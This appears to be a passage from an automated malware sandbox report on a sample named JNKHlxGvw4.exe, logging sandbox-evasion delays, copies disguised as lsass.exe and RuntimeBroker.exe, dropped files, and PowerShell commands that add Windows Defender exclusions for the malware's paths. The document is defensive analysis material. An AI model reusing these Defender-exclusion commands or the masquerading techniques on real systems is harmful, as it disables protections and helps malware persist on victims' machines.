                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Uses ping.exe to sleep
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeMemory allocated: 7E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeMemory allocated: 1A4B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeMemory allocated: 1550000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeMemory allocated: 1B0A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeMemory allocated: 7C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeMemory allocated: 1A6A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeMemory allocated: FA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeMemory allocated: 1ABA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeMemory allocated: 2DC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeMemory allocated: 1ADC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Recovery\USZqVcJFLA.exeMemory allocated: F80000 memory reserve | memory write watch
                    Source: C:\Recovery\USZqVcJFLA.exeMemory allocated: 1AB20000 memory reserve | memory write watch
                    Source: C:\Recovery\USZqVcJFLA.exeMemory allocated: 770000 memory reserve | memory write watch
                    Source: C:\Recovery\USZqVcJFLA.exeMemory allocated: 1A2A0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeMemory allocated: D10000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeMemory allocated: 1A990000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeMemory allocated: 13D0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeMemory allocated: 1AE70000 memory reserve | memory write watch
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeMemory allocated: 7F0000 memory reserve | memory write watch
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeMemory allocated: 1A320000 memory reserve | memory write watch
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeMemory allocated: 9B0000 memory reserve | memory write watch
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeMemory allocated: 1A570000 memory reserve | memory write watch
                    Source: C:\Recovery\USZqVcJFLA.exeMemory allocated: C30000 memory reserve | memory write watch
                    Source: C:\Recovery\USZqVcJFLA.exeMemory allocated: 1A750000 memory reserve | memory write watch
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeMemory allocated: 1770000 memory reserve | memory write watch
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeMemory allocated: 1B2A0000 memory reserve | memory write watch
                    Source: C:\Recovery\USZqVcJFLA.exeMemory allocated: 2560000 memory reserve | memory write watch
                    Source: C:\Recovery\USZqVcJFLA.exeMemory allocated: 1A7E0000 memory reserve | memory write watch
                    Source: C:\Recovery\USZqVcJFLA.exeCode function: 55_2_00007FFD9B8872AB sgdt fword ptr [eax]55_2_00007FFD9B8872AB
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Recovery\USZqVcJFLA.exeThread delayed: delay time: 922337203685477
                    Source: C:\Recovery\USZqVcJFLA.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeThread delayed: delay time: 922337203685477
                    Source: C:\Recovery\USZqVcJFLA.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                    Source: C:\Recovery\USZqVcJFLA.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5454
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5496
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6218
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5877
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5620
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5699
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeDropped PE file which has not been started: C:\Users\user\Desktop\uhdUZoxx.logJump to dropped file
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeDropped PE file which has not been started: C:\Users\user\Desktop\AsBtWtog.logJump to dropped file
                    Source: C:\Recovery\USZqVcJFLA.exeDropped PE file which has not been started: C:\Users\user\Desktop\EDQjSEMY.logJump to dropped file
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeDropped PE file which has not been started: C:\Users\user\Desktop\vnccfbfp.logJump to dropped file
                    Source: C:\Recovery\USZqVcJFLA.exeDropped PE file which has not been started: C:\Users\user\Desktop\bSdYXpxm.logJump to dropped file
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeDropped PE file which has not been started: C:\Users\user\Desktop\RzSYqgUu.logJump to dropped file
                    Source: C:\Recovery\USZqVcJFLA.exeDropped PE file which has not been started: C:\Users\user\Desktop\oBKeyAWK.logJump to dropped file
                    Source: C:\Recovery\USZqVcJFLA.exeDropped PE file which has not been started: C:\Users\user\Desktop\OljzCgRG.logJump to dropped file
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe TID: 6712Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exe TID: 8Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exe TID: 8096Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe TID: 8060Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe TID: 8116Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Recovery\USZqVcJFLA.exe TID: 8064Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Recovery\USZqVcJFLA.exe TID: 8092Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7628Thread sleep count: 5454 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7928Thread sleep time: -8301034833169293s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7780Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616Thread sleep count: 5496 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7944Thread sleep time: -8301034833169293s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7812Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7648Thread sleep count: 6218 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7940Thread sleep time: -9223372036854770s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7624Thread sleep count: 5877 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7936Thread sleep time: -10145709240540247s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7636Thread sleep count: 5620 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7932Thread sleep time: -9223372036854770s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7828Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7640Thread sleep count: 5699 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7948Thread sleep time: -10145709240540247s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7772Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe TID: 8176Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe TID: 8172Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exe TID: 8148Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exe TID: 8164Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Recovery\USZqVcJFLA.exe TID: 6712Thread sleep time: -30000s >= -30000s
                    Source: C:\Recovery\USZqVcJFLA.exe TID: 2844Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe TID: 2200Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Recovery\USZqVcJFLA.exe TID: 6668Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Recovery\USZqVcJFLA.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Recovery\USZqVcJFLA.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Recovery\USZqVcJFLA.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Recovery\USZqVcJFLA.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Recovery\USZqVcJFLA.exeThread delayed: delay time: 922337203685477
                    Source: C:\Recovery\USZqVcJFLA.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeThread delayed: delay time: 922337203685477
                    Source: C:\Recovery\USZqVcJFLA.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                    Source: C:\Recovery\USZqVcJFLA.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                    Source: USZqVcJFLA.exe, 00000035.00000002.1995738292.00000000008D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllss}
                    Source: JNKHlxGvw4.exe, 00000000.00000002.1831258606.00000000006C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\I8
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Recovery\USZqVcJFLA.exeProcess token adjusted: Debug
                    Source: C:\Recovery\USZqVcJFLA.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess token adjusted: Debug
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeProcess token adjusted: Debug
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeProcess token adjusted: Debug
                    Source: C:\Recovery\USZqVcJFLA.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe'
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\USZqVcJFLA.exe'
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\USZqVcJFLA.exe'
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Favorites\lsass.exe'
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\SystemSettings.exe'
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\JNKHlxGvw4.exe'
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\USZqVcJFLA.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\USZqVcJFLA.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Favorites\lsass.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\SystemSettings.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\JNKHlxGvw4.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eaiouozr\eaiouozr.cmdline"Jump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\USZqVcJFLA.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\USZqVcJFLA.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Favorites\lsass.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\SystemSettings.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\JNKHlxGvw4.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8DlY2DY8qp.bat" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5227.tmp" "c:\Windows\System32\CSC33CD08692B74926AEFF4FCBC6A080B2.TMP"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\USZqVcJFLA.exe "C:\Recovery\USZqVcJFLA.exe"
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeQueries volume information: C:\Users\user\Desktop\JNKHlxGvw4.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeQueries volume information: C:\Users\user\Favorites\lsass.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeQueries volume information: C:\Users\user\Favorites\lsass.exe VolumeInformationJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeQueries volume information: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe VolumeInformationJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeQueries volume information: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe VolumeInformationJump to behavior
                    Source: C:\Recovery\USZqVcJFLA.exeQueries volume information: C:\Recovery\USZqVcJFLA.exe VolumeInformation
                    Source: C:\Recovery\USZqVcJFLA.exeQueries volume information: C:\Recovery\USZqVcJFLA.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
